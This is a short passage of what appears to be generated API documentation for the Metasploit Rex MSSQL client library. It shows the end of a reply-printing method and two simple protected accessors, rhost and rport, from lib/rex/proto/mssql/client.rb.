  mssql_print_reply(info) if doprint
  info
end

#rhost ⇒ Object (protected)

# File 'lib/rex/proto/mssql/client.rb', line 730

def rhost
  @rhost
end

#rport ⇒ Object (protected)

# File 'lib/rex/proto/mssql/client.rb', line 734

def rport
  @rport
end